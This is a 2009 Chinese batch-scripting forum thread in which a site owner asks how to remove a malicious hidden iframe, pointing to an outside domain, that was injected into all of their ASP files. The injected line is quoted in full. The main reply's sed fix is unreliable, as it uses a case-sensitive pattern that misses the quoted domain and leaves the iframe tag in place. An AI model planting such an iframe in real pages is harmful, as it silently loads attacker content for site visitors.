[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
返回列表 发帖
aenzo

Rank: 2

帖子
积分
103 
技术
0  
捐助
0  
注册时间
2009-8-2 
1 跳转到 » 正序看帖
打印
tT
发表于 2009-8-2 08:11 | 只看该作者

[文件操作] asp文件被植入恶意代码想批处理去掉如何写代码?

我的小网站上所有的asp文件最后一行被植入了如下语句:

<iframe src=http://www.114Oldest.com/zz/mm.htm with=100 height=0></iframe>

手动删除很费力,能否写一个批处理程序,将该目录下所有asp文件中的那段代码删掉?
请高手指点一下,感激不尽

[ 本帖最后由 aenzo 于 2009-8-3 08:50 编辑 ]
收藏 分享

renmingwu

Rank: 5Rank: 5

帖子
69 
积分
729 
技术
0  
捐助
0  
注册时间
2009-6-11 
5
发表于 2009-8-2 22:15 | 只看该作者
他要是给你批量挂代码了话,应该有一个木马文件,你可以找下,那个木马应该也有清除功能的,我原来看到过的。
大部分是应该是挂在一页的最下面,形如<script>代码,有些代码还加密了</script>

[ 本帖最后由 renmingwu 于 2009-8-2 22:17 编辑 ]

TOP

Batcher

Rank: 12Rank: 12Rank: 12

帖子
14932 
积分
46139 
技术
857  
捐助
745  
注册时间
2008-6-9 
4
发表于 2009-8-2 17:39 | 只看该作者 
  1. sed -i "s/www\.114oldest\.com//g" "C:\test\*.asp"
复制代码
第三方命令行工具 sed.exe 下载地址:
http://bbs.bathome.net/thread-1114-1-1.html
我帮忙写的代码不需要付钱。如果一定要给,请在微信群或QQ群发给大家吧。
【微信公众号、微信群、QQ群】http://bbs.bathome.net/thread-3473-1-1.html
【支持批处理之家,加入VIP会员!】http://bbs.bathome.net/thread-67716-1-1.html

TOP

keen

Rank: 8Rank: 8

帖子
593 
积分
4452 
技术
1  
捐助
0  
注册时间
2008-8-10 
3
发表于 2009-8-2 14:29 | 只看该作者
原帖由 aenzo 于 2009-8-2 08:11 发表
我的小网站上所有的asp文件被植入了www.114oldest.com的恶意代码,手动删除很费力,能否写一个批处理程序,将该目录下所有asp文件中带有www.114oldest.com字样的代码删掉?请高手指点一下,感激不尽



请把asp中恶意代码的位置,前后有无其他内容,有内容的话,都有什么特征或规律……等等内容贴出来。否则大家根本没办法帮你。

请把问题全部更新到顶楼,请勿跟帖描述问题。
(*^_^*)

TOP

jellyhk

Rank: 6Rank: 6

帖子
356 
积分
2177 
技术
6  
捐助
0  
注册时间
2008-8-4 
2
发表于 2009-8-2 10:44 | 只看该作者
困难!什么都不知道啊
本人已死!不用联系!~
要联系下来联系!~~

TOP

返回列表